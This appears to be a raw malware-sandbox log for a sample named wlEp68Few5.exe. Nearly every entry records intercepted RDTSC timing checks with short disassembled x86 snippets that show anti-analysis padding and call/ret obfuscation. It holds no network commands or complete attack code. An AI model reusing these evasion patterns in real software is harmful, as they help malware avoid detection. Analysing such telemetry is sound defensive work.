Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C43466 second address: C434A2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6F946E7E38h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D188Ah] 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D27E5h], edx 0x0000001b push 00000000h 0x0000001d sbb edi, 6CBAE1B4h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 pushad 0x00000027 popad 0x00000028 pop eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F6F946E7E41h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C432F8 second address: C43302 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6F951A9EBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C43302 second address: C43317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F6F946E7E3Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C43317 second address: C4331C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C4512D second address: C4513D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007F6F946E7E36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C44E7C second address: C44E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C44E82 second address: C44E95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F6F946E7E36h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C46542 second address: C4659D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F6F951A9EBCh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F6F951A9EB8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 push 00000000h 0x00000035 mov si, ax 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C44E95 second address: C44E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C4659D second address: C465AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C465AE second address: C465D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C465D1 second address: C465D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C47071 second address: C47075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C4B4CB second address: C4B4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C4834F second address: C48368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6F946E7E3Eh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C48368 second address: C48371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C4CA14 second address: C4CA25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C48371 second address: C48375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C4CA25 second address: C4CA9C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6F946E7E3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F6F946E7E3Ch 0x00000012 add ebx, dword ptr [ebp+122D2917h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F6F946E7E38h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov dword ptr [ebp+12477A90h], esi 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ecx 0x0000003f call 00007F6F946E7E38h 0x00000044 pop ecx 0x00000045 mov dword ptr [esp+04h], ecx 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc ecx 0x00000052 push ecx 0x00000053 ret 0x00000054 pop ecx 0x00000055 ret 0x00000056 push eax 0x00000057 push edx 0x00000058 push ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C4BBEE second address: C4BBF3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C4D98D second address: C4D991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C50C57 second address: C50C6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C522CD second address: C522D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C522D7 second address: C522E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C52AAC second address: C52AB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C54805 second address: C54809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C54AA6 second address: C54AAC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C54AAC second address: C54AC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C569E6 second address: C569F3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6F946E7E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe | RDTSC instruction interceptor: First address: C55ABF second address: C55B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 and edi, dword ptr [ebp+122D3751h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 cld 0x00000017 mov edi, 0AA7FEBCh 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 and edi, dword ptr [ebp+122D3759h] 0x00000029 mov eax, dword ptr [ebp+122D0845h] 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F6F951A9EB8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000018h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 push FFFFFFFFh 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007F6F951A9EB8h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 0000001Bh 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 nop 0x00000066 jmp 00007F6F951A9EC6h 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e ja 00007F6F951A9EBCh 0x00000074 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C55B59 second address: C55B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C58A53 second address: C58ADB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6F951A9EB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F6F951A9EB8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007F6F951A9EC9h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F6F951A9EB8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 push 00000000h 0x0000004a cld 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F6F951A9EC5h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C58ADB second address: C58ADF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CDDA second address: C5CDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CDDE second address: C5CDF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Fh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CDF7 second address: C5CDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CDFD second address: C5CE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CE01 second address: C5CE07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CE07 second address: C5CE35 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6F946E7E4Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F6F946E7E36h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5CE35 second address: C5CE3F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C59CBB second address: C59CDC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F6F946E7E43h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5D48D second address: C5D52D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F6F951A9EBDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 clc 0x00000011 mov edi, dword ptr [ebp+122D19C9h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F6F951A9EB8h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1C8Ah], ebx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007F6F951A9EB8h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 0000001Dh 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 jmp 00007F6F951A9EC0h 0x0000005a adc bl, 00000074h 0x0000005d xchg eax, esi 0x0000005e jmp 00007F6F951A9EC8h 0x00000063 push eax 0x00000064 pushad 0x00000065 push ecx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5D52D second address: C5D536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C56C3E second address: C56C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F6F951A9EB6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C56C4E second address: C56C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C5E757 second address: C5E75B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C61827 second address: C6182D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C66EB8 second address: C66ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6F951A9EB6h 0x0000000a popad 0x0000000b push edx 0x0000000c je 00007F6F951A9EB6h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C66ECB second address: C66ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C66ED1 second address: C66ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C6BADF second address: C6BAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C6BAE8 second address: C6BB16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6F951A9EBCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7035C second address: C70362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70362 second address: C70378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70378 second address: C70387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F6F946E7E36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70C2D second address: C70C5D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6F951A9EB6h 0x00000008 jmp 00007F6F951A9EC7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6F951A9EBDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70C5D second address: C70C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70C61 second address: C70C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6F951A9EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70C6D second address: C70C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70C73 second address: C70C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70C77 second address: C70C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70DE3 second address: C70DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C70DF1 second address: C70E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F946E7E45h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C710DB second address: C710F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBEh 0x00000007 jng 00007F6F951A9EB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C710F7 second address: C710FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C714ED second address: C714F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: BF6A67 second address: BF6A6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7E80F second address: C7E813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7E813 second address: C7E82F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6F946E7E42h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7D320 second address: C7D348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F951A9EBBh 0x00000009 jmp 00007F6F951A9EC9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7D4B2 second address: C7D4B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7D5E9 second address: C7D5FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F951A9EBBh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7D77A second address: C7D786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F6F946E7E36h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7DF5C second address: C7DF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6F951A9EB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7DF66 second address: C7DF80 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6F946E7E36h 0x00000008 jmp 00007F6F946E7E40h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7DF80 second address: C7DF99 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F6F951A9EB6h 0x00000009 jmp 00007F6F951A9EBAh 0x0000000e pop ebx 0x0000000f push esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C27AD7 second address: C27ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C27ADD second address: C27AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C27AE1 second address: C27AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F946E7E3Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C27AF1 second address: C27AF6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C27AF6 second address: C27B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6F946E7E3Dh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7E6BF second address: C7E6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7E6C3 second address: C7E6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: C7CFEE second address: C7D019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F6F951A9EC1h 0x0000000c push ecx 0x0000000d jmp 00007F6F951A9EC0h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
